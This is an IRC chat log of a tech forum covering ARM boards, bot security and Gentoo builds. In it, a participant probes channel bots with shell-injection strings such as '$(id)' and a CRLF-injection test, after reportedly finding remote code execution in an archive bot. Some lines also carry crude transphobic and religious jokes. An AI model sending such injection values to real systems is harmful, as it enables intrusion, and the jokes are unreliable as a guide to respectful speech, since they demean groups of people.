mircea_popescu: | asciilifeform ty | [14:40] |
lobbes: | mircea_popescu makes sense | [14:40] |
mircea_popescu: | lobbes you lopped off a digit from the url it goes by #17924 | [14:40] |
lobbes: | Ahh that's what happened | [14:41] |
mircea_popescu: | asciilifeform you know, your page is stale. it was already fixed in the latest version! | [14:41] |
BingoBoingo: | http://btcbase.org/log/2018-04-03#1792546 << Here it isn't a singluar entity running them. It's what they call gas stations without the gas pumps. | [14:41] |
a111: | Logged on 2018-04-03 18:37 mircea_popescu: http://btcbase.org/log/2018-04-03#1792321 << sounds like local knockoff. this thing only exists in cr, some local entrepreneur (in the proper sense of the term) made a supermarket that actually works. | [14:41] |
douchebag: | sounds good | [14:42] |
mircea_popescu: | BingoBoingo http://arc-anglerfish-arc2-prod-gruponacion.s3.amazonaws.com/public/24AKIANLPZAPNEEN7R4CXKBQIQ.jpg << looks like that ? | [14:42] |
BingoBoingo: | http://btcbase.org/log/2018-04-03#1792553 << Naturally and unnaturally. | [14:42] |
a111: | Logged on 2018-04-03 18:38 mircea_popescu: http://btcbase.org/log/2018-04-03#1792332 << with both mouths, one would hope. | [14:42] |
BingoBoingo: | !!up yangwao | [14:43] |
deedbot: | yangwao voiced for 30 minutes. | [14:43] |
BingoBoingo: | !!up yangwao_ | [14:43] |
deedbot: | yangwao_ voiced for 30 minutes. | [14:43] |
BingoBoingo: | yangwao_: Who is your daddy and what does he do? | [14:43] |
lobbes: | mircea_popescu: But yeah, I need to think through my designs a bit better. Problem is I'm probably missing some crucial first principles. | [14:43] |
mircea_popescu: | lobbes on the positive side, this is how they were born in the first place, by people thinking about it. no revelation under the sun. | [14:44] |
BingoBoingo: | mircea_popescu: Yeah, the Ururuayan things with that string on their signage don't look like that. | [14:44] |
lobbes: | Perhaps I ought to go through all my existing designs, map them out, and then blog post em for forum critique. | [14:44] |
mircea_popescu: | lobbes can't hurt anything. | [14:44] |
lobbes: | True dat. Anyways I'll bbl. Thanks for allowing me to brain pick | [14:46] |
mircea_popescu: | http://btcbase.org/log/2018-04-03#1792337 << was that fedex'd ? | [14:47] |
a111: | Logged on 2018-04-03 17:05 BingoBoingo: asciilifeform: Remember, nothing of incredible value. I am still awaiting a birthday card from February. | [14:47] |
BingoBoingo: | mircea_popescu: Sent US mail, with "International Stamp" per the sender's description | [14:48] |
mircea_popescu: | worth trying a fedex type thing | [14:48] |
BingoBoingo: | Yeah | [14:48] |
douchebag: | later lobbes | [14:49] |
asciilifeform: | BingoBoingo, mircea_popescu : i learned today, that even shitazon ~will~ ship to BingoBoingoistan, BUT demands about 1 $ to every $ of item ordered , in 'import duty prepay' | [14:50] |
douchebag: | Do you guys know the specs of the server ? | [14:53] |
ben_vulpes: | mircea_popescu: is that free shipping to .uy? | [14:53] |
asciilifeform: | unfree | [15:00] |
asciilifeform: | (~on top of~ shipping) | [15:00] |
deedbot: | http://qntra.net/2018/04/venezuelas-education-minister-eat-less-if-you-want-to-see-food-in-supermarkets/ << Qntra - Venezuela's Education Minister: Eat Less If You Want To See Food In Supermarkets | [15:04] |
mircea_popescu: | ben_vulpes well yes. | [15:04] |
mircea_popescu: | douchebag it's above, http://btcbase.org/log/2018-04-03#1792521 | [15:04] |
a111: | Logged on 2018-04-03 18:27 asciilifeform: ROC-RK3328-CC ( currently building a kernel for it, without the 'evil' periphs ) | [15:04] |
mircea_popescu: | asciilifeform he was asking me not you lol. | [15:04] |
asciilifeform: | aaa | [15:04] |
* asciilifeform | thought q was re shitazon-to-uy | [15:05] |
douchebag: | How would this compare to a raspberry pi ? | [15:14] |
asciilifeform: | douchebag: similar, but without the closed shitware iron | [15:15] |
douchebag: | Forsure | [15:15] |
mircea_popescu: | douchebag it's basically a very fast i/o low cpu power box. | [15:18] |
asciilifeform: | not even so low -- 4 x 1.4GHz 64bit | [15:18] |
mircea_popescu: | the republic's de facto moving towards hardware specialization, there's on one hand the very heavy cpu machines (of which sha miners are a subset, phuctor is another, and so on), and then the sort of thing like this, typified by a trb node machine. | [15:19] |
mircea_popescu: | asciilifeform yeah. | [15:19] |
douchebag: | Ooh interesting | [15:19] |
douchebag: | hahaha | [15:20] |
douchebag: | this is hilarious | [15:20] |
douchebag: | https://i.imgur.com/S18PzjG.png | [15:20] |
douchebag: | Just saw this come in | [15:20] |
mircea_popescu: | as you don't do a lot of numbers churning, it might be tghe perfect item for you. and if not, well, we see. | [15:20] |
douchebag: | Awesome | [15:21] |
spyked: | re arm box, /me was considering buying the arm64 olinuxino from teh olimex people. the rockchip board seems very similar (++ on the USB3 port), but I can't seem to find it in the EU. | [15:24] |
asciilifeform: | spyked: olimex lives in eu | [15:25] |
BingoBoingo: | douchebag: If you keep impressing and outgrow the ARM thing, there are worse places to vacation after dropping off a box than Uruguay. The best weather here runs December to February though. | [15:25] |
mod6: | iirc this dude would be coming out of eastern europe. | [15:25] |
mod6: | instead of the united retards | [15:25] |
spyked: | asciilifeform yeah I was talking about the ROC-RK3328-CC. it seems a tad beefier than the olimex counterpart. but otherwise yeah, olimex live very close to me, had a board delivered in ~2 days some months ago. | [15:27] |
asciilifeform: | funnily enuff , it takes typically 3d to usa ! | [15:27] |
asciilifeform: | ( from bulgaria ) | [15:27] |
* asciilifeform | buys fairly often from olimex | [15:27] |
mircea_popescu: | spyked so you can get one from teh pizarro too! | [15:28] |
mircea_popescu: | mod6 wasn't he in chicago ? | [15:29] |
BingoBoingo: | Fucking Yankee from upstate | [15:30] |
mod6: | mircea_popescu: aha, iirc he said he's moving tho | [15:30] |
douchebag: | I will be in the United States in april | [15:30] |
mircea_popescu: | he is better than you rural hicks from southern ill! | [15:30] |
douchebag: | I'm leaving for eastern europe late may | [15:31] |
mod6: | douchebag: ah just through april tho? | [15:31] |
mod6: | ah, alright. will keep that in mind. | [15:31] |
spyked: | mircea_popescu: yeh I'm definitely considering that! the reason I've postponed getting an ARM board at all was the lack of a full-fledged SATA 3 port. I wanna get trb running on arm at some point among others. | [15:31] |
mircea_popescu: | missoury dunno even what chic is, while chicago had it long ago! | [15:31] |
BingoBoingo: | <mircea_popescu> he is better than you rural hicks from southern ill! << This is true. At his age I was solidly anti-productive. | [15:31] |
mircea_popescu: | spyked as described this item would actually make a great node whether the practice holds is to be seen in practice. | [15:32] |
spyked: | also, as a fun-fact: I tried running lispbots on an old first-gen raspberry pi, but it seems SBCL doesn't support threading on ARM (at least not ARMv6 and ARMv7). so I want to test that on ARM64. | [15:32] |
asciilifeform: | spyked: i found 1st gen raspi (entirely aside the q of closed shitware) to be ~unusable -- it shared a usb bus between nic (already slow) and disk | [15:33] |
douchebag: | Oh but yeah, until then - let me know if there are any IRC bots or web applications you want me to take a look at | [15:33] |
spyked: | eh, I ended up using it to host my IRC bouncer. at least it's good enough for that. | [15:35] |
phf: | spyked: i prefer ccl on low powered machines, the only parts of trinque's bot that rely on sbcl are one or two functions related to thread management | [15:37] |
mircea_popescu: | phf still though, losing out on threading on a quad machine is a little dumb. | [15:37] |
phf: | oh, right, that wasn't obvious from what i said, ccl supports multithreading on arms | [15:38] |
mircea_popescu: | a it does ? | [15:38] |
spyked: | oh cool | [15:38] |
mircea_popescu: | i suppose the question of lisp standardization, soon to be visited upon our fair republic, will be one helluva burning flame. | [15:38] |
phf: | i believe rainer joswig hosts his websites on some arm box with CL-HTTP on top of it | [15:38] |
mircea_popescu: | spyked a good move at this point i guess would be patching trinque 's bot to be all cll. | [15:39] |
mircea_popescu: | speaking of pantsuit refraction lulz, https://news.ycombinator.com/item?id=587045 | [15:41] |
ben_vulpes: | mircea_popescu: thanks for extending the counteroffer, i'll take it. will you take payment in pizarro credits? | [15:41] |
mircea_popescu: | oh, and : lobbes other than the design review, consider lifting the whole of gutenberg into your archive ? the idiots already have a https that is broken, so far http only works but who knows how long. | [15:41] |
mircea_popescu: | ben_vulpes cash or bonds, though for the latter no actual discount was discussed in teh nsa boardroom. but i guess i'll go with .4 off the cuff and hope nobody throws gavels at me. | [15:42] |
* trinque | uses ccl elsewhere, would glady sign that patch | [15:44] |
ben_vulpes: | mircea_popescu: works, i'll take it for bonds | [15:44] |
mircea_popescu: | epic contributions from "paul nakata" (hey, nobody on a stick but has a keybase key), some dork who "programs in cl every day" and the whole menagerie of "nobody told us to shut the fuck up like, ever" | [15:45] |
mircea_popescu: | ben_vulpes cool. that takes s.nsa pile to .9 if memory serves ? | [15:46] |
ben_vulpes: | correct you are | [15:46] |
spyked: | mircea_popescu, it's good timing, since I've been doing some reading ircbot code and comparing with my own implementation. I've actually been contemplating http://btcbase.org/log/2018-02-26#1786288 and rolling my own was not a wholly useless endeavour, i.e. http://trilema.com/2016/how-to-participate-in-the-affairs-of-the-most-serene-republic/#selection-322.0-322.5 so I'll document the whole thing on the blog. | [15:46] |
a111: | Logged on 2018-02-26 17:11 mircea_popescu: spyked the bot is a solved problem, genesis and all. | [15:46] |
mircea_popescu: | cool. | [15:47] |
deedbot: | http://qntra.net/2018/04/british-government-lab-admits-no-evidence-for-scandal-used-to-blow-up-diplomatic-relations-and-court-european-sympathy/ << Qntra - British Government Lab Admits No Evidence For Scandal Used To Blow Up Diplomatic Relations And Court European Sympathy | [15:49] |
mircea_popescu: | BingoBoingo mind redirecting www to . sometime too ? | [15:51] |
asciilifeform: | umm qntra down ?? | [15:51] |
BingoBoingo: | mircea_popescu: Sure, I will take a look at it | [15:52] |
mircea_popescu: | try without the www | [15:52] |
asciilifeform: | or nm worx | [15:52] |
phf: | http://btcbase.org/log/2018-04-03#1792608 kek | [15:52] |
a111: | Logged on 2018-04-03 19:20 douchebag: https://i.imgur.com/S18PzjG.png | [15:52] |
mircea_popescu: | "in natural languages, we are used to context. indeed, contextual meaning is what makes natural languages natural. we have `list' as a verb, and we have `list' as a noun. we have `listless' as an adjective describing something (like a programming language) that does not have lists, and an adjective describing someone who is sort of permanently tired. when we need to disambiguate, we do so with more words." | [15:54] |
mircea_popescu: | this actually misses the all-important mechanism. "when we need to disambiguate, we add more words such as to contradict one of the two possible solutions the string could eval to" | [15:54] |
mircea_popescu: | whole fucking natural language is nothing beyhond "add aix^i terms until the damned P has only one real root." | [15:55] |
mircea_popescu: | and "default" is not a perfectly reasonable variable name holy shit. is this guy going to name his daughter "Cunt" ? | [15:58] |
mircea_popescu: | asciilifeform http://p.bvulpes.com/pastes/KLT6U/?raw=true | [16:02] |
asciilifeform: | mircea_popescu: yay! and yes. | [16:19] |
asciilifeform: | 2 per crate. | [16:20] |
mircea_popescu: | cool. | [16:20] |
shinohai: | > Bans gun videos, gets live-action shooting instead http://archive.is/NyMvo | [17:04] |
trinque: | shinohai: https://archive.is/TgtPb << breitbart didn't neglect the "wearing a headscarf" deets | [17:06] |
shinohai: | Allah snackbar! | [17:07] |
asciilifeform: | 'We are seeing @YouTube employees being brought out with hands up!' << lol | [17:07] |
trinque: | they didn't offer up their assholes quick enough? | [17:07] |
mircea_popescu: | heh | [17:14] |
deedbot: | http://trilema.com/2018/on-namespaces/ << Trilema - On namespaces | [17:44] |
douchebag: | glad work is over | [17:48] |
douchebag: | Fucking had this dude from work looking over my shoulder | [17:48] |
douchebag: | asking questions about everything I type in my terminal | [17:49] |
mircea_popescu: | what sort of chickenfarm do you work in lol | [17:51] |
douchebag: | Most of the people there are alright | [17:52] |
douchebag: | This is just new kid who just likes asking too many questions | [17:52] |
asciilifeform: | damn i had nfi douchebag were chained to an oar. suxx. | [17:52] |
douchebag: | and doesn't understand it's considered disrespectful to stare at someone elses computer screen | [17:52] |
douchebag: | nfi? | [17:53] |
mircea_popescu: | no fucking idea | [17:54] |
douchebag: | ahh | [17:54] |
douchebag: | Yeah no it was fine most of the day, this kid would just get out of his seat and stand behind me and start staring at what I was doing and asked a bunch of questions | [17:55] |
douchebag: | how about that shooting though | [17:59] |
douchebag: | so much for mass shooting being a men only sort of deal | [17:59] |
asciilifeform: | bbut lead is banned in californistan!111 | [18:01] |
asciilifeform: | what nao, ban tits ? | [18:01] |
douchebag: | lolol | [18:04] |
douchebag: | asciilifeform: Only womens tits | [18:04] |
douchebag: | Tranny tits are a-okay in California | [18:04] |
mircea_popescu: | basically "liberation" and "4th wave feminism" consists of a bunch of male dweebs with no utility that nobody wants appropriating feminity and taking over boobs. | [18:15] |
mircea_popescu: | ain't enough they kicked women out of the last well paying job available to them (nursing), now they're gonna steal the tits, too ? | [18:15] |
asciilifeform: | lol waitasec this was a trans-postal? | [18:17] |
mircea_popescu: | nfi, i was discussing the "women in tech" trend generally. | [18:19] |
asciilifeform: | aa | [18:19] |
mircea_popescu: | there's by now a large and visible class of dweebs who considered the "should i learn github or get boobs" dilemma and came out with "better get boobs -- govt pays for it." | [18:20] |
douchebag: | Men need to stop acting like women and women need to stop acting like men, imo | [18:20] |
mircea_popescu: | men can't stop acting like women -- there's really nothing else for them. | [18:20] |
asciilifeform: | in other 'holyfuq, chinesium', 1500000 (!) baud default uart. | [18:23] |
* asciilifeform | in fact was not able to find a single usb uart that will reliably rx it: had to use logic analyzer | [18:24] |
* asciilifeform | did in the end find one : ye olde ft232 | [18:38] |
shinohai: | http://therealbitcoin.org/ml/btc-dev/2018-April/000295.html << ty jurov for handling donation, cheers! [~]D | [18:48] |
mod6: | Hey, thanks for your donation shinohai! | [18:55] |
shinohai: | cheers as well! o7 | [18:55] |
douchebag: | just buy the fucking water filters already | [19:06] |
lobbes: | oy, yup this is the spoofed user agent that the phantomjs portion of the process was using. RCE was happening both at the bash level AND via the headless browser.. I got poked in several orifices >> http://btcbase.org/log/2018-04-03#1792665 | [19:36] |
a111: | Logged on 2018-04-03 19:52 a111: Logged on 2018-04-03 19:20 douchebag: https://i.imgur.com/S18PzjG.png | [19:36] |
lobbes: | !!v B7975B7CA5C064DEC53DCE43D14C35C0F1D735FB0F849EE418B922F3A81502F5 | [19:36] |
deedbot: | lobbes rated douchebag 2 << exploited several security holes in my archive process, but was nice enough to tell me rather than pwn me | [19:36] |
douchebag: | <3 | [19:37] |
douchebag: | lobbes: Mind sharing the source code? I could perhaps help you identify further exploits | [19:37] |
douchebag: | i wonder | [19:37] |
douchebag: | !!ratings douchebag | [19:39] |
deedbot: | http://p.bvulpes.com/pastes/AhSME/?raw=true | [19:39] |
douchebag: | !!reputation douchebag | [19:39] |
deedbot: | http://p.bvulpes.com/pastes/xgnGJ/?raw=true | [19:39] |
lobbes: | my plan tonight is to go through and map out whole process (I'll probably tar up my code after I attempt to sanitize inputs), will bake a blog post exposing my naivete to forum at large | [19:40] |
lobbes: | I gotta learn somehow | [19:40] |
phf: | mircea_popescu: "Unlike obligate coprophagiacs, subsistence hunters could not be stone age fucktards, but for whatever reason opt not to." is there a double not in there? | [19:41] |
shinohai: | dont be so hard on self, supbybot/limnoria is broken so beautifully anyway | [19:41] |
douchebag: | lobbes: I'll help you make your bot more secure | [19:41] |
lobbes: | ty douchebag! much appreciated | [19:42] |
lobbes: | and shinohai, as much as I'd like to blame this on supybot, this one is all me (the exploited code was all brewed by yours truly) | [19:42] |
douchebag: | Just tell me essentially what it is you're trying to do, what you have already tried, and then I'll suggest you how to write it properly | [19:43] |
shinohai: | O.o nb lobbes | [19:43] |
lobbes: | douchebag well, it is very convoluted atm. besides, I'd rather there be a static page I can point to than just barfing it in the logs | [19:47] |
lobbes: | I agree this needs archiving (I'm currently working off their version of kritik der reinen vernunft as a german study aid). However, unlike kibo.com I would wager the entirety of gutenberg is much much larger. I'd prolly need moar storage than the ~200gb ssd on the dedicated home craptop I'm currently using (but maybe not) >> http://btcbase.org/log/2018-04-03#1792648 | [19:48] |
a111: | Logged on 2018-04-03 19:41 mircea_popescu: oh, and : lobbes other than the design review, consider lifting the whole of gutenberg into your archive ? the idiots already have a https that is broken, so far http only works but who knows how long. | [19:48] |
* lobbes | bbl food | [19:48] |
douchebag: | Forsure, I'm rather experience with application design from a security prespective so just let me know if you have any questions | [19:48] |
douchebag: | Just make sure a problem like that doesn't occur again. Remote code execution is just as bad as it can get | [19:49] |
trinque: | heh, meanwhile, all of sexual reproduction is based on getting those RCEs | [19:51] |
douchebag: | trinque: That's true | [19:51] |
douchebag: | and I'll tell you why, when working for a company doing a security audit - you will get paid the most for RCE. Women love money, and that money can be used to help take care of the children | [19:53] |
douchebag: | PWN BOXES 2 HELP THE CHILDREN | [19:53] |
trinque: | why, is that's what sperm do, my man. | [19:54] |
douchebag: | eventually | [19:56] |
trinque: | http://btcbase.org/log/2016-09-17#1543393 << thread | [19:56] |
a111: | Logged on 2016-09-17 02:55 mircea_popescu: trinque fancy that, you had to have someone tell you! nature teaches by example, you stick more data into woman each time than you ever did into all machines you ever touched. yet... | [19:56] |
douchebag: | trinque: What other bots are in here besides lobbes and deedbot | [19:56] |
asciilifeform: | pehbot ! | [19:56] |
douchebag: | whats the syntax | [19:56] |
trinque: | ^ and mimisbrunnr | [19:56] |
asciilifeform: | !!up pehbot | [19:57] |
deedbot: | pehbot voiced for 30 minutes. | [19:57] |
douchebag: | also syntax for mimisbrunnr | [19:57] |
asciilifeform: | !A help | [19:57] |
pehbot: | asciilifeform: I am PehBot. See also http://www.loper-os.org/?p=2051 . My Width is currently fixed to 256 and Height to 32. | [19:57] |
trinque: | I think mimisbrunnr only quotes log-lines it's ben_vulpes' | [19:57] |
asciilifeform: | !#s pehbot | [19:58] |
a111: | 98 results for "pehbot", http://btcbase.org/log-search?q=pehbot | [19:58] |
asciilifeform: | ^ see also. | [19:58] |
douchebag: | !#s $(id) | [20:00] |
a111: | 0 results for "$(id)", http://btcbase.org/log-search?q=$%28id%29 | [20:00] |
BingoBoingo: | http://btcbase.org/log/2018-04-03#1792659 << fixed | [20:00] |
a111: | Logged on 2018-04-03 19:51 mircea_popescu: BingoBoingo mind redirecting www to . sometime too ? | [20:00] |
douchebag: | !#help | [20:02] |
douchebag: | !#h | [20:02] |
douchebag: | !A 'help | [20:03] |
pehbot: | douchebag: EGGOG: Pos: 0: Stack Underflow! | [20:03] |
douchebag: | !A ''help | [20:03] |
pehbot: | douchebag: EGGOG: Pos: 0: Stack Underflow! | [20:03] |
douchebag: | !A help | [20:03] |
pehbot: | douchebag: I am PehBot. See also http://www.loper-os.org/?p=2051 . My Width is currently fixed to 256 and Height to 32. | [20:03] |
trinque: | any chance this can be done in pm asciilifeform ? | [20:03] |
mod6: | ^ | [20:03] |
trinque: | before someone gets cranky? | [20:03] |
douchebag: | I agree | [20:03] |
mod6: | to late | [20:03] |
asciilifeform: | trinque: not as such. BUT he really oughta build the proggy and do in his own shell. | [20:03] |
trinque: | there ya go. | [20:04] |
douchebag: | kk | [20:04] |
douchebag: | can I try one last command really quick? | [20:05] |
asciilifeform: | sure? | [20:05] |
douchebag: | !#s \r\nTEST | [20:05] |
a111: | 0 results for "\\r\\nTEST", http://btcbase.org/log-search?q=%5Cr%5CnTEST | [20:05] |
douchebag: | Good job stripping them ! | [20:06] |
asciilifeform: | actually, douchebag , it does no such thing | [20:06] |
asciilifeform: | well, pehbot that is | [20:06] |
douchebag: | I was talking about a111 | [20:06] |
asciilifeform: | aa | [20:07] |
douchebag: | If those lines weren't stripped I could potentially send my own commands to the ircd | [20:07] |
asciilifeform: | i've temporarily moved it to #asciilifeform-test, douchebag , justforyou ! | [20:07] |
douchebag: | thx <3 | [20:08] |
asciilifeform: | plz join. | [20:08] |
phf: | which reminds me that i should implement the help feature, a111 is no conformant at the moment | [20:11] |
phf: | douchebag: a111 logs, speaks logs, responds to #!s #!seen #!seenbefore #!born and #!vulpes | [20:17] |
phf: | of which only #!s and #!seen are useful, and #!born mildly interesting | [20:18] |
phf: | #!born douchebag | [20:18] |
phf: | !#born douchebag | [20:18] |
a111: | 2018-01-11 <douchebag> douchebag | [20:18] |
a111: | http://btcbase.org/log/2018-01-11#1768869 | [20:18] |
douchebag: | http://btcbase.org/log/2018-04-03#$(id) | [20:20] |
phf: | well, since we're testing things http://btcbase.org/log/2018-04-03#1231231231231 | [20:21] |
douchebag: | phf: What sort of topics do you primarily focus on? | [20:22] |
douchebag: | In regards to programming/security/technology ect.. | [20:23] |
phf: | it really depends on when | [20:29] |
phf: | but relevant to the conversation, i grew up in russia in the 90s, so i did infosec until 2005 or so | [20:30] |
phf: | there might be an xss somewhere in btcbase, but highly unlikely | [20:34] |
phf: | i did several talks on the idea that sanitizing data is retarded, and that you're supposed to have a proper parsing strategy instead. that it's in other words an impedance mismatch problem, and if you teach computer your assumptions it will be impossible to have injection issues | [20:35] |
phf: | so cl-irc isn't "stripping away" faulty sequences, there's a state machine parser there that only accepts a valid irc protocol, likewise the renderer is not escaping html, instead the dom is constructed server side and where you have strings, you can only have strings. they will be serialized into html according to html escaping rules. | [20:37] |
asciilifeform: | phf: i was vaguely hoping he might grasp this by playing with pehbot / reading ffa but loox like no dice so far | [20:46] |
asciilifeform: | going by the log in #asciilifeform-test, d00d 1) still refuses to actually read the proggy 2) continues to think that it remaining standing has something at all to do with 'sanitizing' or anticipating whatever attack | [20:48] |
douchebag: | I've never programmed in the language it was written in | [20:49] |
douchebag: | So it makes it a bit difficult | [20:50] |
asciilifeform: | being one of the few languages with actual docs, and of which i used a deliberately small subset -- oughta be pretty simple. | [20:50] |
asciilifeform: | ( oop for instance is not used. nor is heap allocation . ) | [20:51] |
asciilifeform: | meanwhile, in sads, RK3328 ( and in fact every arm cpu in production ) won't boot without a ~1MB evil blob (that in fact runs on dedicated evil-core, just like intel's ME . ) so much for 'published errything.' | [21:06] |
asciilifeform: | and, interestingly, the entire public net appears to be EMPTY of ANY discussion of a cure. | [21:06] |
lobbes: | so, this is kind of like the "default-deny" philosophy? "you may only build the house from this valid list of materials" versus "grab any material you can find, but watch out for this list of lethal building materials"? >> http://btcbase.org/log/2018-04-04#1792809 | [21:38] |
a111: | Logged on 2018-04-04 00:35 phf: i did several talks on the idea that sanitizing data is retarded, and that you're supposed to have a proper parsing strategy instead. that it's in other words an impedance mismatch problem, and if you teach computer your assumptions it will be impossible to have injection issues | [21:38] |
trinque: | the grammar asserts what ought to be there it rejects everything else, but it didn't reject the "all else" item by item. | [21:59] |
lobbes: | hm yeah, applying this to my case: there is only ONE point where user-entered data enters into the process, and that is where the bot snarfs from the chan and inserts into the first sqlite3 db. So really, I just need to teach THAT part of my process what a valid url is, and then parse accordingly | [22:01] |
trinque: | parser implements a given grammar, turning a string (whether considered as text or raw bits) into an abstract syntax tree | [22:01] |
lobbes: | hm okay, this is a bit over my head, but you are saying that I need to understand what the grammar for a url is, and then have the parser follow that grammar? | [22:03] |
douchebag: | lobbes: Why not completely avoid sending any user input to a bash interpreter at all? | [22:08] |
lobbes: | well, it seems like phf's (and others') approach is slightly saner. Even if user input doesn't go to bash, well.. what about the phantomjs exploit you found | [22:09] |
lobbes: | I cannot possibly enumerate what I haven't thought of | [22:09] |
lobbes: | but I CAN enumerate a valid url | [22:10] |
trinque: | sure douchebag, not saying do that either | [22:11] |
lobbes: | yeah, true, I really should do both | [22:12] |
lobbes: | there's also an additional precaution I could take: instead of the thing being on an hourly cronjob, I could easily set up a quick 'validation report' for myself and then pull a 'manual' crank to initiate everything | [22:19] |
lobbes: | ala deedbot and other items | [22:19] |
asciilifeform: | hey trinque , i was attempting a gentoo , and found that i cannot even extract a 2016 stage3 on a sane box because --xattrs-include='*.*' and my tar has nfi what xattrs are | [22:30] |
asciilifeform: | trinque: any idea when this liquishit crept in ? | [22:30] |
asciilifeform: | what's the most recent stage3 that hasn't got it ? | [22:30] |
mircea_popescu: | http://btcbase.org/log/2018-04-03#1792728 << yes, actually. x could not be y, but opt to not-not be y. is this bad ? | [22:48] |
a111: | Logged on 2018-04-03 23:41 phf: mircea_popescu: "Unlike obligate coprophagiacs, subsistence hunters could not be stone age fucktards, but for whatever reason opt not to." is there a double not in there? | [22:48] |
asciilifeform: | incidentally trinque do you know of a musltronic stage3 for arm ? | [22:49] |
mircea_popescu: | http://btcbase.org/log/2018-04-03#1792736 << it's not that big. but, if indeed it is that big this is a reason to find more storage space, can't really cut them off. | [22:52] |
a111: | Logged on 2018-04-03 23:48 lobbes: I agree this needs archiving (I'm currently working off their version of kritik der reinen vernunft as a german study aid). However, unlike kibo.com I would wager the entirety of gutenberg is much much larger. I'd prolly need moar storage than the ~200gb ssd on the dedicated home craptop I'm currently using (but maybe not) >> http://btcbase.org/log/2018-04-03#1792648 | [22:52] |
mircea_popescu: | http://btcbase.org/log/2018-04-03#1792743 << bwahaha wut. | [22:53] |
a111: | Logged on 2018-04-03 23:53 douchebag: and I'll tell you why, when working for a company doing a security audit - you will get paid the most for RCE. Women love money, and that money can be used to help take care of the children | [22:53] |
mircea_popescu: | !!up candi_lustt | [22:54] |
deedbot: | candi_lustt voiced for 30 minutes. | [22:54] |
mircea_popescu: | ^ there douchebag , now you can learn lips. | [22:54] |
mircea_popescu: | and in other "best villains of the silver screen", https://www.youtube.com/watch?v=-N9LnkKQfuc | [22:55] |
mircea_popescu: | #!born douchebag | [22:57] |
mircea_popescu: | !#born phf | [22:58] |
a111: | 2014-03-20 <phf> not quite | [22:58] |
a111: | http://btcbase.org/log/2014-03-20#570859 | [22:58] |
mircea_popescu: | phf it's supposed to produce no more than one line per command. | [22:58] |
mircea_popescu: | http://btcbase.org/log/2018-04-04#1792811 << this is not something that can be "grasped" as such. | [23:00] |
a111: | Logged on 2018-04-04 00:46 asciilifeform: phf: i was vaguely hoping he might grasp this by playing with pehbot / reading ffa but loox like no dice so far | [23:00] |
mircea_popescu: | much in the vein astronomy can not be grasped playing with ptolemaic spheres. | [23:01] |
mircea_popescu: | http://btcbase.org/log/2018-04-04#1792809 << links ? hm ? HM ? | [23:01] |
a111: | Logged on 2018-04-04 00:35 phf: i did several talks on the idea that sanitizing data is retarded, and that you're supposed to have a proper parsing strategy instead. that it's in other words an impedance mismatch problem, and if you teach computer your assumptions it will be impossible to have injection issues | [23:01] |
mircea_popescu: | i mean my talk to ro politicians about basic economics from like 2005 is on the fucking web ffs! | [23:02] |
mircea_popescu: | and the time i burned the koran/bible and the time i stabbed that rabbit and so following. | [23:02] |
* asciilifeform | actually watches the 2005 one , it was lulzy | [23:02] |
asciilifeform: | *watched | [23:02] |
mircea_popescu: | dja understand what it says ? | [23:03] |
asciilifeform: | at the time understood maybe half . really oughta rewatch these days | [23:03] |
mircea_popescu: | http://trilema.com/2009/banii-oamenii-si-valorile-liberale/ << uncharacteristically for vloggers, transcript is available. | [23:04] |
asciilifeform: | oh hah. | [23:04] |
asciilifeform: | this almost takes out all the sport tho. | [23:04] |
mircea_popescu: | myeah. | [23:04] |
mircea_popescu: | incidentrally, the comments are something else. | [23:10] |
asciilifeform: | http://p.bvulpes.com/pastes/LsmJG/?raw=true << d00d's total effort in re pehbot , thus far. | [23:11] |
mircea_popescu: | im sure he'll say something if he finds something neh | [23:12] |
asciilifeform: | doesn't show any symptoms of approaching the thing in any way other than http://btcbase.org/log/2016-05-01#1460013 | [23:12] |
a111: | Logged on 2016-05-01 14:53 mircea_popescu: asciilifeform> mod6: the baked-in presumption of webtardism is almost insulting << it is insulting, not to us though. think about it : the crab has pincers because in its environment THAT WORKS and so does "GET /blog/blog-config.php~". | [23:12] |
mircea_popescu: | eh, what's the rush. | [23:23] |
mircea_popescu: | http://btcbase.org/log/2018-04-04#1792817 << fuck 'em. let them sell to each other for bitpaybux until they fall over for all i care. | [23:24] |
a111: | Logged on 2018-04-04 01:06 asciilifeform: meanwhile, in sads, RK3328 ( and in fact every arm cpu in production ) won't boot without a ~1MB evil blob (that in fact runs on dedicated evil-core, just like intel's ME . ) so much for 'published errything.' | [23:24] |
mircea_popescu: | http://btcbase.org/log/2018-04-04#1792818 << the english web is empty of EVERYTHING. there isn't anything there. i looked. | [23:24] |
a111: | Logged on 2018-04-04 01:06 asciilifeform: and, interestingly, the entire public net appears to be EMPTY of ANY discussion of a cure. | [23:24] |
asciilifeform: | mircea_popescu: it's chinese, therefore lulzy. mine seems to boot up with the shitrom broken... | [23:25] |
mircea_popescu: | yes but it probably doesn't have $random-useless-feature!!1 | [23:25] |
asciilifeform: | boots -- believe or not -- a gentoo. | [23:26] |
asciilifeform: | as of 5min ago. | [23:26] |
mircea_popescu: | http://btcbase.org/log/2018-04-04#1792831 << this is the worst choice, in general. | [23:26] |
a111: | Logged on 2018-04-04 02:19 lobbes: there's also an additional precaution I could take: instead of the thing being on an hourly cronjob, I could easily set up a quick 'validation report' for myself and then pull a 'manual' crank to initiate everything | [23:26] |
mircea_popescu: | http://btcbase.org/log/2018-04-04#1792834 << ext4 | [23:28] |
a111: | Logged on 2018-04-04 02:30 asciilifeform: trinque: any idea when this liquishit crept in ? | [23:28] |
mircea_popescu: | fwiw, iirc reiserfs has them too. | [23:28] |
asciilifeform: | it's in tar. | [23:28] |
asciilifeform: | from 1.27 and up. | [23:28] |
asciilifeform: | q for trinque was , when did gentoo stage3 start using this 'feature'. | [23:29] |
mircea_popescu: | probably once they started supporting ext4. | [23:29] |
mircea_popescu: | anyway, odds are you can just take it out. | [23:29] |
asciilifeform: | nope. $box supports ext4 , but tar 1.26. | [23:29] |
mircea_popescu: | just drop the flag, see what happens. | [23:29] |
asciilifeform: | and i untarred in spite of this oddity, and the only barf was that python, ping, and cc1 binaries failed to extract. but oddly enuff extracted later manually... | [23:30] |
asciilifeform: | and appear to work | [23:30] |
mircea_popescu: | anyway. extended attributes is this ~dead standard that got implemented anyway, basically a kludgy extension of chown. | [23:31] |
* asciilifeform | did realize this | [23:31] |
mircea_popescu: | the flag tells tar whether to store this extra metadata with the files or not. generally droppoing it has no effect. ah ok then | [23:31] |
* trinque | couldn't say, haven't tilted at tar just yet | [23:38] |
Category: Logs